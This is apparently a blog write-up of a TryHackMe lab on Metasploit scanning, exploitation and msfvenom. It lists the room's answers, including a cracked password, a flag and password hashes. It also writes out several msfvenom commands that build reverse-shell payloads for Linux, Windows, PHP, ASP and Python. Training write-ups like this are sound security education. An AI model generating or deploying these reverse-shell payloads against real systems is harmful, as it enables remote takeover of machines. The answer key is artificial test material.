TryHackMe- Metasploit: Exploitation Writeup

2 min readApr 27, 2022

This room aims to teach us how to use Metasploit for scanning, vulnerability assessment and exploitation. It can be accessed using the link:

Task 2: Scanning

We can scan the ports using Metasploit. We can list potential port scanning modules available using the search portscan command.

  • CONCURRENCY: Number of targets to be scanned simultaneously.
  • PORTS: Port range to be scanned. Please note that 1–1000 here will not be the same as using Nmap with the default configuration. Nmap will scan the 1000 most used ports, while Metasploit will scan port numbers from 1 to 10000.
  • RHOSTS: Target or target network to be scanned.
  • THREADS: Number of threads that will be used simultaneously. More threads will result in faster scans.

We can directly perform Nmap scans from the msfconsole prompt faster.


  1. How many ports are open on the target system? Answer: 5
  2. Using the relevant scanner, what NetBIOS name can you see? Answer: ACME IT SUPPORT
  3. What is running on port 8000? Answer: webfs/1.21
  4. What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task. Answer: leo1234

Task 4: Vulnerability Scanning

We can use the info command for any module to have a better understanding of its use and purpose.


  1. Who wrote the module that allows us to check SMTP servers for open relay? Answer: Campbell Murray

Task 5: Exploitation

  1. What is the content of the flag.txt file? Answer: THM-5455554845
  2. What is the NTLM hash of the password of the user “pirate”? Answer: 8ce9a3ebd1647fcc5e04025019f4b875

Task 6: Msfvenom

Msfvenom, which replaced Msfpayload and Msfencode, allows us to generate payloads. To enlist all payloads, we use msfvenom -l payloads. The msfvenom — list formats command can be used to list supported output formats. An example command for msfvenom is msfvenom -p php/reverse_php LHOST= LPORT=7777 -f raw > reverse_shell.php

Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw >

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php


  1. What is the other user’s password hash? Answer: $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Hope this blog helped you…..